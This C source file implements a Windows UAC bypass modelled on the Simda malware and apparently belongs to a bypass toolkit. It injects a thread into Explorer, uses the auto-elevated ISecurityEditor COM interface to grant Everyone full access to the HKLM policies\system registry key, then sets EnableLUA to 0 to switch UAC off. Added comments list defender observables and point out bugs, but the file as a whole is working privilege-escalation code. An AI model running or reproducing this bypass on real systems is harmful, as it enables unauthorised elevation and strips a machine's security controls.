/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015
*
* TITLE: SIMDA.C
*
* VERSION: 1.10
*
* DATE: 28 Mar 2015
*
* Simda based UAC bypass using ISecurityEditor.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/* Parameter block handed to the remote thread procedure (ucmElevatedDisableProc)
 * through ucmInjectExplorer; it is filled in by ucmSimdaTurnOffUac below.
 * File-scope and mutable with no synchronization visible in this file, so the
 * two functions below are not safe to run concurrently. */
ELOAD_PARAMETERS_2 g_ElevParams2;
/*
* ucmElevatedDisableProc
*
* Purpose:
*
* Disable UAC using AutoElevated ISecurityEditor.
*
*/
/*
 * Thread procedure that rewrites the DACL of elvpar->szKey. It is passed to
 * ucmInjectExplorer by ucmSimdaTurnOffUac, so presumably it executes inside the
 * injected process — confirm in ucmInjectExplorer. Every Win32/COM entry point
 * is reached through the function pointers in elvpar, never by direct import.
 *
 * elvpar - parameter block (CLSID/IID, moniker, key path, new SDDL, function
 *          pointers). Must not be NULL; E_FAIL is returned otherwise.
 *
 * Returns the HRESULT of the last COM call, cast to DWORD: the CoInitialize
 * result if that fails, the CoCreateInstance/CoGetObject failure, E_FAIL when
 * CoGetObject produces no interface, otherwise the SetSecurity result.
 *
 * Defender notes: the key's current DACL (from GetSecurity) and the new SDDL
 * are both emitted through OutputDebugStringW, and the DACL of elvpar->szKey is
 * replaced via SetSecurity — a DACL change on that registry key is the
 * observable side effect of this routine.
 */
DWORD WINAPI ucmElevatedDisableProc(
    PELOAD_PARAMETERS_2 elvpar
)
{
    HRESULT r;
    BOOL cond = FALSE;               /* never set: the do/while runs once, break == jump to cleanup */
    ISecurityEditor *SecurityEditor1 = NULL;
    BIND_OPTS3 bop;
    LPOLESTR pps;

    if (elvpar == NULL) {
        return (DWORD)E_FAIL;
    }

    /* Nothing has been acquired yet, so a failed CoInitialize returns directly
     * and skips the CoUninitialize at the bottom. */
    r = elvpar->xCoInitialize(NULL);
    if (r != S_OK) {
        return r;
    }

    RtlSecureZeroMemory(&bop, sizeof(bop));

    do {
        r = elvpar->xCoCreateInstance(&elvpar->xCLSID_ShellSecurityEditor, NULL,
            CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
            &elvpar->xIID_ISecurityEditor, &SecurityEditor1);
        if (r != S_OK) {
            break;
        }

        /* This instance is released immediately and never used; the interface
         * actually called below comes from CoGetObject. NOTE(review):
         * SecurityEditor1 is not reset to NULL after this Release, so if
         * CoGetObject fails without clearing its out-pointer the cleanup at the
         * end releases a stale pointer — confirm CoGetObject's failure contract. */
        if (SecurityEditor1 != NULL)
            SecurityEditor1->lpVtbl->Release(SecurityEditor1);

        bop.cbStruct = sizeof(bop);
        bop.dwClassContext = CLSCTX_LOCAL_SERVER;
        r = elvpar->xCoGetObject(elvpar->EleMoniker, (BIND_OPTS *)&bop, &elvpar->xIID_ISecurityEditor, &SecurityEditor1);
        if (r != S_OK)
            break;
        if (SecurityEditor1 == NULL) {
            r = E_FAIL;
            break;
        }

        /* Read the current DACL as SDDL. Its result is only logged: a failure
         * here does not stop the SetSecurity below. NOTE(review): pps is
         * presumably callee-allocated and is never freed in this function
         * (no CoTaskMemFree) — confirm the ownership rule of GetSecurity. */
        pps = NULL;
        r = SecurityEditor1->lpVtbl->GetSecurity(
            SecurityEditor1,
            elvpar->szKey,
            SE_REGISTRY_KEY,
            DACL_SECURITY_INFORMATION,
            &pps
        );
        if ((r == S_OK) && (pps != NULL)) {
            elvpar->xOutputDebugStringW(pps);
        }

        /* Replace the key's DACL with elvpar->szNewSDDL; this HRESULT is what
         * the function ultimately returns on the success path. */
        r = SecurityEditor1->lpVtbl->SetSecurity(
            SecurityEditor1,
            elvpar->szKey,
            SE_REGISTRY_KEY,
            DACL_SECURITY_INFORMATION,
            elvpar->szNewSDDL
        );
        if (r == S_OK) {
            elvpar->xOutputDebugStringW(elvpar->szNewSDDL);
        }

    } while (cond);

    /* Cleanup shared by every break above. */
    if (SecurityEditor1 != NULL)
        SecurityEditor1->lpVtbl->Release(SecurityEditor1);

    elvpar->xCoUninitialize();
    return r;
}
/*
* ucmSimdaTurnOffUac
*
* Purpose:
*
* Disable UAC using AutoElevated undocumented ISecurityEditor interface.
* Used by WinNT/Simda from 2010 until today.
*
*/
/*
 * Entry point of this module. Fills the file-scope g_ElevParams2 block
 * (moniker, target key, new SDDL, CLSID/IID, resolved function pointers),
 * hands it to ucmInjectExplorer together with ucmElevatedDisableProc, and —
 * if that reports success — writes EnableLUA = 0 under the policies\system key.
 *
 * Returns the BOOL result of ucmInjectExplorer (FALSE on any setup failure).
 * The registry write that follows is not reflected in the return value.
 *
 * Defender notes: the high-signal observables here are the DACL change on
 * HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system, the
 * REG_DWORD write of EnableLUA = 0 to that key, and the
 * "[UCM] Key security compromised" debug string.
 */
BOOL ucmSimdaTurnOffUac(
    VOID
)
{
    BOOL cond = FALSE, bResult = FALSE;   /* cond is never set: single-pass do/while, break == early exit */
    DWORD dwValue;
    LRESULT lRet;
    HKEY hKey;
    HINSTANCE hKrnl, hOle32, hShell32;

    do {
        // load/reference required dlls
        hKrnl = GetModuleHandle(KERNEL32DLL);
        if (hKrnl == NULL) {
            //just to shut up mars.
            // (kernel32 is always mapped; the check exists to satisfy analysis tooling)
            break;
        }

        /* ole32/shell32 are loaded if not already present. There is no matching
         * FreeLibrary in this function, so a LoadLibrary reference is kept for
         * the life of the process. */
        hOle32 = GetModuleHandle(OLE32DLL);
        if (hOle32 == NULL) {
            hOle32 = LoadLibrary(OLE32DLL);
            if (hOle32 == NULL) {
                break;
            }
        }
        hShell32 = GetModuleHandle(SHELL32DLL);
        if (hShell32 == NULL) {
            hShell32 = LoadLibrary(SHELL32DLL);
            if (hShell32 == NULL) {
                break;
            }
        }

        /* Unbounded copies into g_ElevParams2 buffers; the buffer sizes are
         * declared in global.h, not visible here — assumed large enough for
         * these fixed literals. */
        lstrcpyW(g_ElevParams2.EleMoniker, L"Elevation:Administrator!new:{4D111E08-CBF7-4f12-A926-2C7920AF52FC}");
        lstrcpyW(g_ElevParams2.szKey, L"MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system");
        lstrcpyW(g_ElevParams2.szNewSDDL, L"D:(A;;GA;;;WD)");

        if (CLSIDFromString(L"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}",
            &g_ElevParams2.xCLSID_ShellSecurityEditor) != NOERROR)
        {
            break;
        }
        if (IIDFromString(L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}",
            &g_ElevParams2.xIID_ISecurityEditor) != S_OK)
        {
            break;
        }

        /* Resolve the imports the remote thread procedure will call through.
         * NOTE(review): none of these GetProcAddress results is NULL-checked
         * before ucmInjectExplorer is called. */
        g_ElevParams2.xCoInitialize = (pfnCoInitialize)GetProcAddress(hOle32, "CoInitialize");
        g_ElevParams2.xCoCreateInstance = (pfnCoCreateInstance)GetProcAddress(hOle32, "CoCreateInstance");
        g_ElevParams2.xCoGetObject = (pfnCoGetObject)GetProcAddress(hOle32, "CoGetObject");
        g_ElevParams2.xCoUninitialize = (pfnCoUninitialize)GetProcAddress(hOle32, "CoUninitialize");
        g_ElevParams2.xOutputDebugStringW = (pfnOutputDebugStringW)GetProcAddress(hKrnl, "OutputDebugStringW");

        bResult = ucmInjectExplorer(&g_ElevParams2, ucmElevatedDisableProc);
        if (bResult) {
            /* Fixed 1 s delay; no completion signal from the injected thread
             * is checked, so this is presumably a race-avoidance wait. */
            Sleep(1000);

            /* Success of the DACL rewrite is inferred from being able to open
             * the key with KEY_ALL_ACCESS; hKey is only read after
             * RegOpenKeyEx succeeded (short-circuit), so it is never used
             * uninitialized. */
            lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"),
                0, KEY_ALL_ACCESS, &hKey);
            if ((lRet == ERROR_SUCCESS) && (hKey != NULL)) {
                OutputDebugString(TEXT("[UCM] Key security compromised"));
                dwValue = 0;
                /* NOTE(review): the RegSetValueEx return value is ignored, so
                 * bResult stays TRUE even if this write fails. */
                RegSetValueEx(hKey, TEXT("EnableLUA"), 0, REG_DWORD, (LPBYTE)&dwValue, sizeof(DWORD));
                RegCloseKey(hKey);
            }
        }

    } while (cond);

    return bResult;
}